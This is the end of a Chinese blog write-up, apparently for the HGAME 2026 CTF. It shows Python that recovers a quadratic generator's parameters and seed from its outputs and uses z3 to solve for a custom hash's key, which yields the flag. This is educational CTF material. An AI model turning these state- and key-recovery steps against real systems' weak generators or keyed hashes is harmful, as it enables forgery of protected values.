        <span class="token keyword">return</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> <span class="token punctuation">(</span>p <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">//</span> <span class="token number">4</span><span class="token punctuation">,</span> p<span class="token punctuation">)</span>
    q <span class="token operator">=</span> p <span class="token operator">-</span> <span class="token number">1</span>
    s <span class="token operator">=</span> <span class="token number">0</span>
    <span class="token keyword">while</span> q <span class="token operator">%</span> <span class="token number">2</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">:</span>
        q <span class="token operator">//=</span> <span class="token number">2</span>
        s <span class="token operator">+=</span> <span class="token number">1</span>
    z <span class="token operator">=</span> <span class="token number">2</span>
    <span class="token keyword">while</span> legendre<span class="token punctuation">(</span>z<span class="token punctuation">,</span> p<span class="token punctuation">)</span> <span class="token operator">!=</span> p <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">:</span>
        z <span class="token operator">+=</span> <span class="token number">1</span>
    c <span class="token operator">=</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>z<span class="token punctuation">,</span> q<span class="token punctuation">,</span> p<span class="token punctuation">)</span>
    x <span class="token operator">=</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> <span class="token punctuation">(</span>q <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">//</span> <span class="token number">2</span><span class="token punctuation">,</span> p<span class="token punctuation">)</span>
    t <span class="token operator">=</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> q<span class="token punctuation">,</span> p<span class="token punctuation">)</span>
    m <span class="token operator">=</span> s
    <span class="token keyword">while</span> t <span class="token operator">!=</span> <span class="token number">1</span><span class="token punctuation">:</span>
        i <span class="token operator">=</span> <span class="token number">1</span>
        t2i <span class="token operator">=</span> <span class="token punctuation">(</span>t <span class="token operator">*</span> t<span class="token punctuation">)</span> <span class="token operator">%</span> p
        <span class="token keyword">while</span> t2i <span class="token operator">!=</span> <span class="token number">1</span><span class="token punctuation">:</span>
            t2i <span class="token operator">=</span> <span class="token punctuation">(</span>t2i <span class="token operator">*</span> t2i<span class="token punctuation">)</span> <span class="token operator">%</span> p
            i <span class="token operator">+=</span> <span class="token number">1</span>
            <span class="token keyword">if</span> i <span class="token operator">==</span> m<span class="token punctuation">:</span>
                <span class="token keyword">return</span> <span class="token boolean">None</span>
        b <span class="token operator">=</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>c<span class="token punctuation">,</span> <span class="token number">1</span> <span class="token operator">&lt;&lt;</span> <span class="token punctuation">(</span>m <span class="token operator">-</span> i <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p<span class="token punctuation">)</span>
        x <span class="token operator">=</span> <span class="token punctuation">(</span>x <span class="token operator">*</span> b<span class="token punctuation">)</span> <span class="token operator">%</span> p
        t <span class="token operator">=</span> <span class="token punctuation">(</span>t <span class="token operator">*</span> b <span class="token operator">*</span> b<span class="token punctuation">)</span> <span class="token operator">%</span> p
        c <span class="token operator">=</span> <span class="token punctuation">(</span>b <span class="token operator">*</span> b<span class="token punctuation">)</span> <span class="token operator">%</span> p
        m <span class="token operator">=</span> i
    <span class="token keyword">return</span> x

<span class="token keyword">def</span> <span class="token function">solve_abc</span><span class="token punctuation">(</span>xs<span class="token punctuation">:</span> <span class="token builtin">list</span><span class="token punctuation">,</span> n<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> Tuple<span class="token punctuation">[</span><span class="token builtin">int</span><span class="token punctuation">,</span> <span class="token builtin">int</span><span class="token punctuation">,</span> <span class="token builtin">int</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
    x1<span class="token punctuation">,</span> x2<span class="token punctuation">,</span> x3<span class="token punctuation">,</span> x4 <span class="token operator">=</span> xs
    A <span class="token operator">=</span> <span class="token punctuation">(</span>x2 <span class="token operator">*</span> x2 <span class="token operator">-</span> x1 <span class="token operator">*</span> x1<span class="token punctuation">)</span> <span class="token operator">%</span> n
    B <span class="token operator">=</span> <span class="token punctuation">(</span>x2 <span class="token operator">-</span> x1<span class="token punctuation">)</span> <span class="token operator">%</span> n
    C <span class="token operator">=</span> <span class="token punctuation">(</span>x3 <span class="token operator">-</span> x2<span class="token punctuation">)</span> <span class="token operator">%</span> n
    D <span class="token operator">=</span> <span class="token punctuation">(</span>x3 <span class="token operator">*</span> x3 <span class="token operator">-</span> x2 <span class="token operator">*</span> x2<span class="token punctuation">)</span> <span class="token operator">%</span> n
    E <span class="token operator">=</span> <span class="token punctuation">(</span>x3 <span class="token operator">-</span> x2<span class="token punctuation">)</span> <span class="token operator">%</span> n
    F <span class="token operator">=</span> <span class="token punctuation">(</span>x4 <span class="token operator">-</span> x3<span class="token punctuation">)</span> <span class="token operator">%</span> n
    det <span class="token operator">=</span> <span class="token punctuation">(</span>A <span class="token operator">*</span> E <span class="token operator">-</span> B <span class="token operator">*</span> D<span class="token punctuation">)</span> <span class="token operator">%</span> n
    det_inv <span class="token operator">=</span> inv<span class="token punctuation">(</span>det<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    a <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>E <span class="token operator">*</span> C <span class="token operator">-</span> B <span class="token operator">*</span> F<span class="token punctuation">)</span> <span class="token operator">%</span> n<span class="token punctuation">)</span> <span class="token operator">*</span> det_inv <span class="token operator">%</span> n
    b <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>A <span class="token operator">*</span> F <span class="token operator">-</span> D <span class="token operator">*</span> C<span class="token punctuation">)</span> <span class="token operator">%</span> n<span class="token punctuation">)</span> <span class="token operator">*</span> det_inv <span class="token operator">%</span> n
    c <span class="token operator">=</span> <span class="token punctuation">(</span>x2 <span class="token operator">-</span> <span class="token punctuation">(</span>a <span class="token operator">*</span> x1 <span class="token operator">*</span> x1 <span class="token operator">+</span> b <span class="token operator">*</span> x1<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">%</span> n
    <span class="token keyword">return</span> a<span class="token punctuation">,</span> b<span class="token punctuation">,</span> c

<span class="token keyword">def</span> <span class="token function">recover_seed</span><span class="token punctuation">(</span>x1<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> a<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> b<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> c<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> n<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> Tuple<span class="token punctuation">[</span><span class="token builtin">int</span><span class="token punctuation">,</span> <span class="token builtin">int</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> a <span class="token operator">%</span> n <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">:</span>
        x0 <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>x1 <span class="token operator">-</span> c<span class="token punctuation">)</span> <span class="token operator">*</span> inv<span class="token punctuation">(</span>b<span class="token punctuation">,</span> n<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">%</span> n
        <span class="token keyword">return</span> x0<span class="token punctuation">,</span> x0
    two_a_inv <span class="token operator">=</span> inv<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token number">2</span> <span class="token operator">*</span> a<span class="token punctuation">)</span> <span class="token operator">%</span> n<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    delta <span class="token operator">=</span> <span class="token punctuation">(</span>b <span class="token operator">*</span> b <span class="token operator">-</span> <span class="token number">4</span> <span class="token operator">*</span> a <span class="token operator">*</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>c <span class="token operator">-</span> x1<span class="token punctuation">)</span> <span class="token operator">%</span> n<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">%</span> n
    r <span class="token operator">=</span> tonelli_shanks<span class="token punctuation">(</span>delta<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    <span class="token keyword">if</span> r <span class="token keyword">is</span> <span class="token boolean">None</span><span class="token punctuation">:</span>
        <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span><span class="token string">"no sqrt for delta"</span><span class="token punctuation">)</span>
    x0a <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token operator">-</span>b <span class="token operator">+</span> r<span class="token punctuation">)</span> <span class="token operator">%</span> n<span class="token punctuation">)</span> <span class="token operator">*</span> two_a_inv <span class="token operator">%</span> n
    x0b <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token operator">-</span>b <span class="token operator">-</span> r<span class="token punctuation">)</span> <span class="token operator">%</span> n<span class="token punctuation">)</span> <span class="token operator">*</span> two_a_inv <span class="token operator">%</span> n
    <span class="token keyword">return</span> x0a<span class="token punctuation">,</span> x0b

<span class="token keyword">def</span> <span class="token function">shash_py</span><span class="token punctuation">(</span>value<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">,</span> key<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token builtin">int</span><span class="token punctuation">:</span>
    mask <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token number">1</span> <span class="token operator">&lt;&lt;</span> <span class="token number">256</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span>
    x <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token builtin">ord</span><span class="token punctuation">(</span>value<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&lt;&lt;</span> <span class="token number">7</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span> mask
    <span class="token keyword">for</span> ch <span class="token keyword">in</span> value<span class="token punctuation">:</span>
        x <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>key <span class="token operator">*</span> x<span class="token punctuation">)</span> <span class="token operator">&amp;</span> mask<span class="token punctuation">)</span> <span class="token operator">^</span> <span class="token builtin">ord</span><span class="token punctuation">(</span>ch<span class="token punctuation">)</span>
    x <span class="token operator">^</span><span class="token operator">=</span> <span class="token builtin">len</span><span class="token punctuation">(</span>value<span class="token punctuation">)</span> <span class="token operator">&amp;</span> mask
    <span class="token keyword">return</span> x

<span class="token keyword">def</span> <span class="token function">solve_key_with_z3</span><span class="token punctuation">(</span>h<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> value<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token builtin">int</span><span class="token punctuation">:</span>
    <span class="token keyword">from</span> z3 <span class="token keyword">import</span> BitVec<span class="token punctuation">,</span> Solver<span class="token punctuation">,</span> BitVecVal<span class="token punctuation">,</span> ULE
    key <span class="token operator">=</span> BitVec<span class="token punctuation">(</span><span class="token string">'key'</span><span class="token punctuation">,</span> <span class="token number">256</span><span class="token punctuation">)</span>
    s <span class="token operator">=</span> Solver<span class="token punctuation">(</span><span class="token punctuation">)</span>
    s<span class="token punctuation">.</span>add<span class="token punctuation">(</span>ULE<span class="token punctuation">(</span>key<span class="token punctuation">,</span> BitVecVal<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token number">1</span> <span class="token operator">&lt;&lt;</span> <span class="token number">70</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">256</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    x <span class="token operator">=</span> BitVecVal<span class="token punctuation">(</span><span class="token builtin">ord</span><span class="token punctuation">(</span>value<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&lt;&lt;</span> <span class="token number">7</span><span class="token punctuation">,</span> <span class="token number">256</span><span class="token punctuation">)</span>
    <span class="token keyword">for</span> ch <span class="token keyword">in</span> value<span class="token punctuation">:</span>
        x <span class="token operator">=</span> <span class="token punctuation">(</span>key <span class="token operator">*</span> x<span class="token punctuation">)</span> <span class="token operator">^</span> BitVecVal<span class="token punctuation">(</span><span class="token builtin">ord</span><span class="token punctuation">(</span>ch<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">256</span><span class="token punctuation">)</span>
    x <span class="token operator">=</span> x <span class="token operator">^</span> BitVecVal<span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>value<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">256</span><span class="token punctuation">)</span>
    s<span class="token punctuation">.</span>add<span class="token punctuation">(</span>x <span class="token operator">==</span> BitVecVal<span class="token punctuation">(</span>h<span class="token punctuation">,</span> <span class="token number">256</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> s<span class="token punctuation">.</span>check<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>r <span class="token operator">!=</span> <span class="token number">1</span><span class="token punctuation">:</span>
        <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span><span class="token string">"unsat"</span><span class="token punctuation">)</span>
    m <span class="token operator">=</span> s<span class="token punctuation">.</span>model<span class="token punctuation">(</span><span class="token punctuation">)</span>
    kval <span class="token operator">=</span> m<span class="token punctuation">.</span><span class="token builtin">eval</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">.</span>as_long<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> kval

<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    xs<span class="token punctuation">,</span> n <span class="token operator">=</span> read_data<span class="token punctuation">(</span><span class="token punctuation">)</span>
    a<span class="token punctuation">,</span> b<span class="token punctuation">,</span> c <span class="token operator">=</span> solve_abc<span class="token punctuation">(</span>xs<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    x0a<span class="token punctuation">,</span> x0b <span class="token operator">=</span> recover_seed<span class="token punctuation">(</span>xs<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> a<span class="token punctuation">,</span> b<span class="token punctuation">,</span> c<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    value <span class="token operator">=</span> <span class="token string">"Welcome to HGAME 2026!"</span>
    cand <span class="token operator">=</span> <span class="token punctuation">[</span>x0a<span class="token punctuation">,</span> x0b<span class="token punctuation">]</span>
    key <span class="token operator">=</span> <span class="token boolean">None</span>
    seed <span class="token operator">=</span> <span class="token boolean">None</span>
    <span class="token keyword">for</span> h <span class="token keyword">in</span> cand<span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            k <span class="token operator">=</span> solve_key_with_z3<span class="token punctuation">(</span>h<span class="token punctuation">,</span> value<span class="token punctuation">)</span>
            key <span class="token operator">=</span> k
            seed <span class="token operator">=</span> h
            <span class="token keyword">break</span>
        <span class="token keyword">except</span> Exception<span class="token punctuation">:</span>
            <span class="token keyword">pass</span>
    <span class="token keyword">if</span> key <span class="token keyword">is</span> <span class="token boolean">None</span><span class="token punctuation">:</span>
        <span class="token keyword">raise</span> RuntimeError<span class="token punctuation">(</span><span class="token string">"key not found"</span><span class="token punctuation">)</span>
    magic_word <span class="token operator">=</span> <span class="token string">"I get the key now!"</span>
    flag <span class="token operator">=</span> <span class="token string">"VIDAR&#123;"</span> <span class="token operator">+</span> <span class="token builtin">hex</span><span class="token punctuation">(</span>shash_py<span class="token punctuation">(</span>magic_word<span class="token punctuation">,</span> key<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">]</span> <span class="token operator">+</span> <span class="token string">"&#125;"</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>seed<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>flag<span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>最终得到flag</p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20213711.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>DODOR
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://dodor.top/2026/02/09/DODOR-000a01-WEEK1-WP/" title="DODOR#000a01-WEEK1-WP">https://dodor.top/2026/02/09/DODOR-000a01-WEEK1-WP/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/12/20/DODOR-blog/" rel="prev" title="DODOR-blog">
                  <i class="fa fa-angle-left"></i> DODOR-blog
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2026/02/21/DODOR-000a01-WEEK2-WP/" rel="next" title="DODOR#000a01-WEEK2-WP">
                  DODOR#000a01-WEEK2-WP <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2025 – 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-code"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">DODOR</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">5k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">17 分钟</span>
  </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
